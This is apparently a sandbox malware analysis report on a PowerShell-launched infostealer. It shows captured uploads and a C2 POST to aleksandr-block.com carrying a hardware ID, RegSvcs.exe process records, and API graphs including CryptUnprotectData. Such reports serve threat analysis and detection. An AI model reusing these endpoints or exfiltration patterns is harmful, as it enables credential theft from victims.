                                                                              Data Ascii: GvMyr-C*LZ;6@EzyP8e=C9eYQ2<kT7R8SU3fBpX2E"Ca`Mf}|3L6c+>=:,iw,bI|zumrssnM*=g3Xk`IVSeDG9rVUDO+rES9!g\_U^
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: e9 3a 03 19 99 41 f2 15 81 da fd 98 78 1a df f4 8a 83 24 49 46 cb 35 2d 3c 8a e4 a9 9c 79 b3 ab 6b 27 ac f4 9d 31 cc ee f0 f9 ad cc f8 95 5b c7 6d d2 a2 c4 8e f2 fc 40 98 c2 c8 fc 37 0e e1 64 ab 39 61 1e d7 93 09 aa 02 82 01 3e a3 22 ef 7e d7 98 7a 9b 58 67 a0 6e 73 8e 28 4a 5c d8 fe e0 6d 99 16 5d aa 9d fc c8 08 75 b7 7b 46 f8 15 87 2b 2c 33 fa 9e 98 ca 87 22 0b 43 dc 69 fd e9 d9 8e 20 d2 15 b6 37 5b 5a f9 ca 90 87 1b 07 46 9b 60 5a 96 58 2d c8 f8 6c bf 9c dc 71 86 1b 87 86 0c 25 5e b6 5a de de e1 23 8a 1e b5 b0 ed c6 4d 62 1a 06 22 1d ff f3 57 ff bf 17 2b 2e b0 36 09 33 47 41 ca 15 44 7d c0 2d a4 16 12 54 9e 1b 4e 25 a0 c8 10 bf 63 67 a3 a7 68 4d ad 3c 02 99 f0 3a 2c 40 4e cb ce 73 7d e6 05 b7 b8 bc cf 85 a3 af e2 de 52 be 35 be bc 5f 24 fd df 0d ee f4
                                                                              Data Ascii: :Ax$IF5-<yk'1[m@7d9a>"~zXgns(J\m]u{F+,3"Ci 7[ZF`ZX-lq%^Z#Mb"W+.63GAD}-TN%cghM<:,@Ns}R5_$
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: 69 79 19 f1 fa ce 51 70 da c7 59 6a d3 02 98 d0 63 43 4b 79 85 f6 86 87 bb a4 27 ee c4 5c af fc f0 09 ab 52 55 13 fc 94 52 80 dd ef 8d b8 7b d8 17 dc f9 dd f3 bd 95 5d 14 ec b5 ab ba dd 1c 6c 12 4e 55 62 b5 6f 7a 0a f2 b6 b6 b2 2c 36 63 b1 5e 97 85 3f 9d b2 d8 75 72 a2 07 ce b0 9c 77 9f c1 ed be 27 bc f2 b6 3e 8c 27 b9 74 f1 9a d0 b3 2e 67 e1 b9 89 58 84 df 41 3c 1e ef 94 66 a0 87 0e 4d e1 77 95 8a f9 6a cb 98 fa f3 a2 2f 8c 0b 48 70 bf 53 c3 f9 00 79 2b 96 fe 61 57 8a 6c fa f4 42 67 f0 50 51 a1 e3 8e 8c 51 d8 e9 7c e5 93 52 b8 36 2e ac c7 2f ab b6 be 53 a4 59 41 4b ab f4 a7 31 51 80 fa d7 f9 73 c2 bb 57 d0 94 ca ac bd 23 b3 44 95 fc af cf 0a ed f5 62 fb 23 39 11 41 a7 4e b2 cd aa 9d cf eb 15 b4 5e 23 7b b4 12 10 46 50 b0 e8 2a c4 e8 2b 0f 3b f5 d3 6d bc
                                                                              Data Ascii: iyQpYjcCKy'\RUR{]lNUboz,6c^?urw'>'t.gXA<fMwj/HpSy+aWlBgPQQ|R6./SYAK1QsW#Db#9AN^#{FP*+;m
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: 2b 09 08 bd 08 42 e2 da 3d 23 aa 51 88 08 76 39 25 e2 4c 22 c2 f0 18 b7 3c cc 76 a3 8e 9a 4f 32 97 3e b4 7e a9 94 a0 7c ec 0b f9 d8 17 e6 bb 7e 1b 25 ee c6 05 20 8e c2 1e 44 64 40 f0 86 fc a8 f3 d8 b1 ca 43 e3 7f 59 de 16 52 a5 c8 d0 65 48 b2 b6 14 91 31 c5 a9 a2 b7 78 df ed 69 49 aa 5c 55 5d 11 d7 a8 f8 e4 01 7a 9d ec 42 50 0c 29 7f ef 6a 31 15 fe 85 a5 c9 a5 dc 5a bd 44 cc ec b5 11 73 d8 a4 ff 4b a6 ae 22 af ef 28 47 8b d2 4f 2f 11 d8 79 60 6f 5e 4a f0 97 80 c5 47 b2 61 f7 7d 56 c3 db d8 c7 b6 cd d2 bf 7e bc f8 c5 7f fe de 24 6b 60 84 cd fc b7 ae fa 28 eb 4f f5 a3 3b 8e d5 47 91 20 a3 61 3e 98 fb 0a 17 f0 1c 1a 78 5c bb 50 2d 0e aa 02 4b 6c 8f 22 29 da da 10 45 a3 91 5d 5b a4 c2 7a 46 fb 66 ab 8b 4d 71 00 8c 43 4f f4 2f 5e fd 32 4e 88 ff 72 54 ff 85 9d
                                                                              Data Ascii: +B=#Qv9%L"<vO2>~|~% Dd@CYReH1xiI\U]zBP)j1ZDsK"(GO/y`o^JGa}V~$k`(O;G a>x\P-Kl")E][zFfMqCO/^2NrT
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: da 82 eb e3 dc 8f ec 54 5f c1 f3 ca 4d b5 89 11 b5 e2 4d fe a9 1b fa 4a 8d 46 2b ae 55 53 40 61 59 8a 0d cf 5b 65 3e 39 45 1e c9 f3 ff f7 bb 41 6b c8 4b ee c6 4b d0 75 95 db 30 61 6f 1e c6 2b df 63 44 3e 24 96 33 75 78 90 9b 6b 48 af e3 2e 8b ea 8c dd 29 7b e1 73 86 a1 6c 87 c3 a5 d6 31 af 41 67 a3 db 82 f7 c3 8e b0 5f 0e 73 67 c4 04 59 32 37 ea 15 5b e6 1d c0 17 2c ae 51 3f 28 68 a3 0d 3a 7f 06 94 82 cb e6 f4 5d 46 71 d7 02 1f ae 14 29 dc 07 91 ce bf 13 76 9c fc 1f 04 41 f1 06 ba af 82 76 64 45 92 3d b5 99 6c 67 6d 71 25 d7 7b 9f a4 52 87 5d 1a 73 23 3f 36 4e 19 b1 3b c0 42 b0 7f 5b 48 19 e2 e7 f2 d4 ff 48 67 c7 b8 d8 10 0d 7c 8a 4d 2d 87 17 39 cc 0f f7 ac f4 a0 e7 7a 74 a0 9a 0e 40 5f 9b ba ac 16 14 b7 3c d7 be e1 8b a4 9f a1 84 53 66 28 e6 77 d4 e5 d5
                                                                              Data Ascii: T_MMJF+US@aY[e>9EAkKKu0ao+cD>$3uxkH.){sl1Ag_sgY27[,Q?(h:]Fq)vAvdE=lgmq%{R]s#?6N;B[HHg|M-9zt@_<Sf(w
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: 70 90 86 b7 4f 3e 76 79 22 87 87 f7 d7 8b 64 9f d3 1d aa 14 75 57 df f2 81 53 78 5d 18 5f ea d2 29 f8 9e 8f a0 40 2c 86 a7 b3 12 37 cd 97 9b 7c 03 8a e4 61 e1 32 54 aa af a1 f3 f2 df 4e bb ba 54 84 2e 8f 18 5d e6 13 40 d5 70 ba 4e b1 7b 52 e1 e0 23 2b 44 1b c8 91 48 ae 2b c8 cf 37 8b f2 61 84 e4 25 a7 29 ce 2f c3 76 ac 72 fd a1 0d 41 86 d5 0a d0 68 61 9b ba f6 b6 80 cb a2 e0 1e c2 5a 81 22 8b 6a 14 cd ad 7d bf a9 23 d0 63 ba cf e0 6a f1 0e af b2 80 b1 89 71 2b 28 de 83 2b 7f 37 6c c7 7f 6a a1 0c 65 46 1d 89 8e 28 3a 89 d7 df c6 14 3a 50 ab df 73 56 55 44 72 78 45 cd 39 63 19 79 d4 8d fb 16 cd c1 57 5f c5 9e 42 3b 27 53 74 cf 1b 6e a4 93 bb 58 9a af eb c4 95 f0 c4 74 b3 c0 99 d9 4b 78 eb cd 81 c1 74 25 e9 02 4c 2e dd ba 49 cf 91 44 9e 3b 39 cd 63 1f 65 e1
                                                                              Data Ascii: pO>vy"duWSx]_)@,7|a2TNT.]@pN{R#+DH+7a%)/vrAhaZ"j}#cjq+(+7ljeF(::PsVUDrxE9cyW_B;'StnXtKxt%L.ID;9ce
                                                                              2025-01-14 17:01:19 UTC15331OUTData Raw: f7 81 e5 66 8f 03 fb 04 19 f6 1b 9f d1 81 89 6d 51 23 1d 38 98 b2 cb 39 42 14 31 ea 10 13 ee fb 2d d7 f1 84 a8 28 af 70 e4 c8 07 22 0a f3 a5 8f 26 cd c1 c6 7a 0d 34 88 d2 44 ac 00 a5 88 bd 61 85 1c 40 b6 ab 09 6e 03 28 09 d4 7c 6e 51 b2 5a f7 07 d3 72 44 cc 6e df c3 bb d6 71 d4 8b 63 da 83 51 ce 8d fa dd 0c 41 88 20 24 3a ec 30 9f e3 cf 3e b0 2e 7f cb d4 e8 13 12 15 3b 3d db 35 5d 78 07 e5 f5 37 81 4b ad 91 a9 c2 a6 5a 9c a2 64 7c bd d9 a2 9a 44 be 32 ca 83 1a 09 21 4e ea 07 9c 05 41 77 00 f1 b2 18 8e 2a 21 d2 f4 4a 69 8b d0 4e 33 13 41 15 e5 01 ac 6d 4a db 4a e2 c1 7a d3 82 31 39 d5 16 f9 24 1d 6c a7 17 30 33 9e 3a c8 55 82 01 0b 5b a6 fd a8 e3 79 ca 3d b7 59 3c 0f d4 5e ab a1 62 e3 8d c7 5b b8 48 ce c8 dc 28 5f 5c 75 d9 64 e4 59 75 5b a1 85 fb 9d 6c 91
                                                                              Data Ascii: fmQ#89B1-(p"&z4Da@n(|nQZrDnqcQA $:0>.;=5]x7KZd|D2!NAw*!JiN3AmJJz19$l03:U[y=Y<^b[H(_\udYu[l
                                                                              2025-01-14 17:01:22 UTC1131INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:22 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=as42hcvqeodv1nek7pujoiick0; expires=Sat, 10 May 2025 10:48:00 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KcLVhwTWaAi0bLdCXPfZIifz6rIM6URVoFFmdjBy7vZwPyV%2Ba1FuHYLrrIgWEGQN1ktA5PDyywkT91rGxeRiuDUk3mwHoV9BPVQrINCPxcdlekH9BJ9CySIfP1aw9XUIvYP%2FsJF1"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f2ff739a418c4-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1560&min_rtt=1546&rtt_var=609&sent=206&recv=606&lost=0&retrans=0&sent_bytes=2845&recv_bytes=592907&delivery_rate=1754807&cwnd=169&unsent_bytes=0&cid=21d67fd06c3a4af1&ts=2786&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.1049782188.114.97.34437912C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-14 17:01:23 UTC267OUTPOST /api HTTP/1.1
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                              Content-Length: 82
                                                                              Host: aleksandr-block.com
                                                                              2025-01-14 17:01:23 UTC82OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 55 6b 67 4c 76 2d 2d 50 49 53 59 41 26 6a 3d 26 68 77 69 64 3d 46 45 32 31 30 36 45 36 37 35 33 44 38 43 36 37 45 32 46 43 46 31 45 45 41 37 34 35 37 39 38 45
                                                                              Data Ascii: act=get_message&ver=4.0&lid=DUkgLv--PISYA&j=&hwid=FE2106E6753D8C67E2FCF1EEA745798E
                                                                              2025-01-14 17:01:23 UTC1123INHTTP/1.1 200 OK
                                                                              Date: Tue, 14 Jan 2025 17:01:23 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: PHPSESSID=d7rjsgu6ka2amkot261elurunn; expires=Sat, 10 May 2025 10:48:02 GMT; Max-Age=9999999; path=/
                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                              Pragma: no-cache
                                                                              X-Frame-Options: DENY
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              cf-cache-status: DYNAMIC
                                                                              vary: accept-encoding
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BXVD42n05jTm3eE0tIZX1iCO81FzLpYntkBNZKesQuoerjyBtZ4vKwoXOlxmeU3lqj2MAxhYfnM4erNpJ%2FcJl%2FI0TNHle0aXrm8a6vcXYy3IlKDBd8i8OhhG3Y07pxHYJy6YmaLE"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 901f300c8cac4232-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1603&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=985&delivery_rate=1718658&cwnd=217&unsent_bytes=0&cid=22af9eeb0fb48ba7&ts=779&x=0"
                                                                              2025-01-14 17:01:23 UTC54INData Raw: 33 30 0d 0a 6e 6d 6c 75 48 37 51 33 61 77 6e 54 73 43 2f 76 6f 72 59 34 6c 53 31 30 52 55 41 30 6d 45 6c 79 65 72 4a 49 64 75 51 52 6a 38 7a 46 4e 41 3d 3d 0d 0a
                                                                              Data Ascii: 30nmluH7Q3awnTsC/vorY4lS10RUA0mElyerJIduQRj8zFNA==
                                                                              2025-01-14 17:01:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:1
                                                                              Start time:12:01:05
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\62.122.184.98 (3).ps1"
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:2
                                                                              Start time:12:01:05
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff620390000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:12:01:09
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                              Imagebase:0x190000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:12:01:09
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                              Imagebase:0x150000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:10
                                                                              Start time:12:01:09
                                                                              Start date:14/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                              Imagebase:0xa40000
                                                                              File size:45'984 bytes
                                                                              MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Reset < >

                                                                                Execution Graph

                                                                                Execution Coverage:2%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:5
                                                                                Total number of Limit Nodes:0
                                                                                execution_graph 6269 7ff7c0fdd7f5 6270 7ff7c0fdd805 6269->6270 6273 7ff7c0fdd878 6270->6273 6274 7ff7c0fdffc0 ResumeThread 6273->6274 6276 7ff7c0fdf7ba 6274->6276
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1336405174.00007FF7C10A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C10A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c10a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 878bfb7a6f055f71409761b2a214a1c6103ed252f30e84565c8e7eb2729becb4
                                                                                • Instruction ID: 8ae387a05e4743e3336d181d91c965f8a5143a1a23edc707a2d00fdcc387c222
                                                                                • Opcode Fuzzy Hash: 878bfb7a6f055f71409761b2a214a1c6103ed252f30e84565c8e7eb2729becb4
                                                                                • Instruction Fuzzy Hash: E2423931A0DBC94FE796AF3858556B4BBE1EF47320B4902FBD049CB193D968AC46C361

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1335864377.00007FF7C0FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c0fd0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                • Opcode ID: 3d9bca3ac8043a4a16a4f4834092a331b439d95a0db46ae0c8d55657fad7b3c2
                                                                                • Instruction ID: 24e91eb1e06ab5ee0ab2969f3e6e30735a4f4a6ba46293725749497986362770
                                                                                • Opcode Fuzzy Hash: 3d9bca3ac8043a4a16a4f4834092a331b439d95a0db46ae0c8d55657fad7b3c2
                                                                                • Instruction Fuzzy Hash: EC310A3190DB4C8FDB59DF688449AE9BBE0EF56320F0441AFD04AC72A2DA75A809C791
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1336405174.00007FF7C10A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C10A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c10a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: fb33f48b5a1c6e3a00a783b61c32d1bfbc61b109b2079dc51afa979b913db4d5
                                                                                • Instruction ID: b0f50b5f8368249a819ef0d266e128614eaed1dd0e9528e60b1eabbf613d6e4d
                                                                                • Opcode Fuzzy Hash: fb33f48b5a1c6e3a00a783b61c32d1bfbc61b109b2079dc51afa979b913db4d5
                                                                                • Instruction Fuzzy Hash: AB511831E0CA898FE795EE6C5464674BBE1FF56360B8A01FAC44DCB193ED68EC458360
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1336405174.00007FF7C10A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C10A0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c10a0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b7108c92069fc890c1c35c6b629168b890ea20893964f1846ba0abe64d5f8580
                                                                                • Instruction ID: 0cff7dd2ef8792fcda83a6c10a1ff4333e7272ceea75ec04f568069080c689c6
                                                                                • Opcode Fuzzy Hash: b7108c92069fc890c1c35c6b629168b890ea20893964f1846ba0abe64d5f8580
                                                                                • Instruction Fuzzy Hash: 07720931A0DB894FE756AB2858552B4BBE1EF57320B4A01FFD04DCB1D3D968AC46C3A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1335864377.00007FF7C0FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c0fd0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 5c9fed9e86bb9677af2690a12f1b01869d54fb69d2caccb577200fbe1c5d918e
                                                                                • Instruction ID: 59c7d8e66b1904bb992deaf558628ea1680d53e9c62e885ee9c97a8e55c6bce9
                                                                                • Opcode Fuzzy Hash: 5c9fed9e86bb9677af2690a12f1b01869d54fb69d2caccb577200fbe1c5d918e
                                                                                • Instruction Fuzzy Hash: C541137160E7855FD31EDF78885A666BBE0EF4712430542AFC0CACB5A3DA68680B87D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1335864377.00007FF7C0FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c0fd0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: a44e455e9ae8165c6e3964af07174d6b6a298cc20e284e92b07f79a42f66d8cb
                                                                                • Instruction ID: 17b19c49666bdfa7e1e9a62febd2d917385c7780860eda99285fd00adda7cc61
                                                                                • Opcode Fuzzy Hash: a44e455e9ae8165c6e3964af07174d6b6a298cc20e284e92b07f79a42f66d8cb
                                                                                • Instruction Fuzzy Hash: 2731597264E3880FD31D9E748C9A872BFA4DB5312430642EFC4C3CB5B3DA49A80787A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1335864377.00007FF7C0FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c0fd0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f058d7563f08c268e497c46299f7f8e0a358fd6fbae14128d4967cfaaeec5925
                                                                                • Instruction ID: 0e7957a466cc87e33ce3818f621e4c8288d355c1e04c75300e3b1063a9c723de
                                                                                • Opcode Fuzzy Hash: f058d7563f08c268e497c46299f7f8e0a358fd6fbae14128d4967cfaaeec5925
                                                                                • Instruction Fuzzy Hash: 2501A262A5D35D1B932CACB54CCB473F70EC397619313923DEAD3C65A2EE40A82355D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1335864377.00007FF7C0FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0FD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_7ff7c0fd0000_powershell.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 26faddc692310dfd4a7b7997cdc730744afdb7189f8158272c4b70ad9e5b31c5
                                                                                • Instruction ID: 2fccb03543ca2bad583dc99b592dab82baf0ad9be87c4a27abe4a224ace5c5b9
                                                                                • Opcode Fuzzy Hash: 26faddc692310dfd4a7b7997cdc730744afdb7189f8158272c4b70ad9e5b31c5
                                                                                • Instruction Fuzzy Hash: A6012421B5C25917A32CACB98CCB433F60ED3C3228712C33DDAD7C2596EE50642345D1

                                                                                Execution Graph

                                                                                Execution Coverage:8.7%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:48.6%
                                                                                Total number of Nodes:286
                                                                                Total number of Limit Nodes:29
                                                                                execution_graph 14502 43b300 14503 43b325 14502->14503 14506 43b354 14503->14506 14511 43fcf0 LdrInitializeThunk 14503->14511 14505 43b497 14506->14505 14508 43b3e6 14506->14508 14510 43fcf0 LdrInitializeThunk 14506->14510 14508->14505 14512 43fcf0 LdrInitializeThunk 14508->14512 14510->14506 14511->14503 14512->14508 14513 410409 14514 410423 14513->14514 14515 4106d2 RtlExpandEnvironmentStrings 14514->14515 14519 40eae2 14514->14519 14516 410745 14515->14516 14517 4107c8 RtlExpandEnvironmentStrings 14516->14517 14516->14519 14517->14519 14520 41083f 14517->14520 14521 414710 14520->14521 14522 414730 14521->14522 14522->14522 14523 442da0 LdrInitializeThunk 14522->14523 14524 41486d 14523->14524 14525 41488f 14524->14525 14529 414aa5 14524->14529 14532 414b0d 14524->14532 14533 4148cc 14524->14533 14536 443050 14524->14536 14525->14529 14525->14532 14525->14533 14540 4430e0 14525->14540 14529->14533 14546 43fcf0 LdrInitializeThunk 14529->14546 14531 442da0 LdrInitializeThunk 14534 414c7d 14531->14534 14532->14531 14532->14532 14533->14519 14533->14533 14535 442da0 LdrInitializeThunk 14534->14535 14535->14534 14537 44308e 14536->14537 14538 44306e 14536->14538 14537->14525 14538->14537 14547 43fcf0 LdrInitializeThunk 14538->14547 14541 4430f9 14540->14541 14542 4148bd 14540->14542 14541->14542 14548 43fcf0 LdrInitializeThunk 14541->14548 14542->14529 14542->14532 14542->14533 14544 443148 14544->14542 14549 43fcf0 LdrInitializeThunk 14544->14549 14546->14533 14547->14537 14548->14544 14549->14542 14388 440748 14390 440769 14388->14390 14391 44078e 14388->14391 14389 4407ee 14390->14391 14395 43fcf0 LdrInitializeThunk 14390->14395 14391->14389 14394 43fcf0 LdrInitializeThunk 14391->14394 14394->14389 14395->14391 14555 40dc8c 14557 40dc98 14555->14557 14558 40dcb4 14555->14558 14556 40dcfe 14577 424c50 14556->14577 14557->14558 14581 43fcf0 LdrInitializeThunk 14557->14581 14558->14556 14582 43fcf0 LdrInitializeThunk 14558->14582 14562 40dd40 14563 425470 6 API calls 14562->14563 14564 40dd60 14563->14564 14565 425710 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14564->14565 14566 40dd80 14565->14566 14567 4273d0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14566->14567 14568 40dda0 14567->14568 14569 427b30 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14568->14569 14570 40dda9 14569->14570 14571 427e30 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14570->14571 14572 40ddb2 14571->14572 14573 4298a0 RtlExpandEnvironmentStrings 14572->14573 14574 40dddb 14573->14574 14575 436170 6 API calls 14574->14575 14576 40de04 14575->14576 14578 424ca0 14577->14578 14578->14578 14579 424ce7 RtlExpandEnvironmentStrings 14578->14579 14580 424d30 14579->14580 14580->14580 14581->14558 14582->14556 14583 424d94 14584 424d9c 14583->14584 14585 424dac RtlExpandEnvironmentStrings 14584->14585 14586 424deb 14585->14586 14591 424dd3 14585->14591 14586->14586 14587 442ef0 LdrInitializeThunk 14586->14587 14589 424ed1 14587->14589 14588 425061 GetLogicalDrives 14590 442ef0 LdrInitializeThunk 14588->14590 14589->14588 14589->14589 14590->14591 14592 414e18 14594 4151c4 14592->14594 14596 414e16 14592->14596 14605 414e22 14592->14605 14593 443050 LdrInitializeThunk 14593->14596 14597 415445 14594->14597 14598 41544a 14594->14598 14601 4152b5 14594->14601 14595 4430e0 LdrInitializeThunk 14595->14596 14596->14592 14596->14593 14596->14594 14596->14595 14603 41519a CryptUnprotectData 14596->14603 14608 43fcf0 LdrInitializeThunk 14596->14608 14621 419000 14597->14621 14604 41b570 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 14598->14604 14598->14605 14607 442ef0 LdrInitializeThunk 14598->14607 14601->14598 14602 415345 14601->14602 14609 41b570 14602->14609 14603->14594 14603->14596 14603->14605 14604->14598 14607->14598 14608->14596 14610 41b5c2 14609->14610 14656 413c90 14610->14656 14622 419023 14621->14622 14624 41903e 14621->14624 14622->14624 14664 43fcf0 LdrInitializeThunk 14622->14664 14625 4190de 14624->14625 14665 43fcf0 LdrInitializeThunk 14624->14665 14626 41913e 14625->14626 14648 419442 14625->14648 14666 43fcf0 LdrInitializeThunk 14625->14666 14629 43e510 RtlAllocateHeap 14626->14629 14635 419249 14626->14635 14632 4191bc 14629->14632 14630 4191ee 14631 